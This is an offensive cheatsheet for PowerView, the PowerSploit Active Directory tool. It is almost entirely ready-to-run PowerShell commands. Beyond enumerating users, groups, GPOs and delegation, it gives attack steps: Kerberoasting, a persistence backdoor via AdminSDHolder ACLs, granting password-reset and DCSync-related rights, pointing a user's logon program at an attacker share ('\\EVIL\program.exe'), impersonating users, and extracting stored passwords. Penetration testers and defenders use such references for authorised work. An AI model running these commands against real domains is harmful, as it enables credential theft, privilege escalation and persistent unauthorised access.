PowerView Cheatsheet

Introduction

Latest version: Always use the dev branch of PowerSploit https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Naming convention:
Get-*: Retrieve raw data
Find-*: Locate specific entries
Add/Set-*: Modify objects
Invoke-*: Catch-all actions
Suffixes: Domain* (LDAP/.NET), WMI* (WMI), Net* (Win32 API)

User Enumeration

Basic User Queries

# Get all groups a user belongs to (recursive)
Get-DomainGroup -MemberIdentity <User/Group>

# Get effective members of a group (recursive)
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Use alternate credentials
$SecPassword = ConvertTo-SecureString 'Password!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)
Get-DomainUser -Credential $Cred

Filtered User Searches

# Users with passwords changed >1 year ago
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset

# Enabled/disabled users
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"  # Enabled
Get-DomainUser -UACFilter ACCOUNTDISABLE  # Disabled

# Smartcard authentication
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED  # No smartcard

# Multiple identity types
'SID','CN=dfm,CN=Users,DC=testlab,DC=local','GUID','admin' | Get-DomainUser -Properties samaccountname,lastlogoff

# Service accounts (SPNs)
Get-DomainUser -SPN

# Kerberos pre-auth not required
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

Advanced User Searches

# Service accounts in "Domain Admins"
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}

# Users with sidHistory
Get-DomainUser -LDAPFilter '(sidHistory=*)'

# Constrained delegation
Get-DomainUser -TrustedToAuth

# Find machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}

Computer Enumeration

# Unconstrained delegation computers
Get-DomainComputer -Unconstrained

# Find computers in specific OU
Get-DomainComputer -SearchBase "ldap://OU=..."

# Find computers with 'outlier' properties
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier

GPO Enumeration

# Get GPOs applied to a machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local

# Map GPOs to computers/users
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -LocalGroup RDP  # RDP access

# Export GPO mappings
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

# Get domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights

# Get domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy  # Golden ticket info
$DomainPolicy.SystemAccess     # Password settings

ACL Management

# Enumerate ACLs for an object
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

# Grant password reset rights
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword

# Audit AdminSDHolder ACLs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

# Backdoor via AdminSDHolder
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

# DCsync rights
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    $_.ObjectType -match 'replication-get' -or $_.ActiveDirectoryRights -match 'GenericAll'
}

# Change object owner
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

Delegation

# Unconstrained delegation + logged-on users
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount

# Find logged-on users on unconstrained servers
Find-DomainUserLocation -ComputerUnconstrained -ShowAll

# Hunt admin users on unconstrained servers
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

Kerberoasting

# Kerberoast users in specific OU
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"

Local Group Enumeration

# Get local groups on remote server
Get-NetLocalGroup SERVER.domain.local

# Get local group members (API method)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

Forest Global Catalog

# Enumerate global catalogs
Get-ForestGlobalCatalog

# Resolve short names to FQDNs
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}

File Finding

# Find interesting files with alternate credentials
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential

Object Manipulation

# Set object property
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'}

# Save/load PowerView objects
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

Impersonation

# Impersonate user
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred

# Revert to self
Invoke-RevertToSelf

Miscellaneous

# Foreign users in domain local groups
$ForeignUsers = Get-DomainObject -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'}
# ...process memberships...

# Check for user passwords
Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {
    Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru
} | fl

Tip: Set $FormatEnumerationLimit=-1 to avoid truncating large output.

References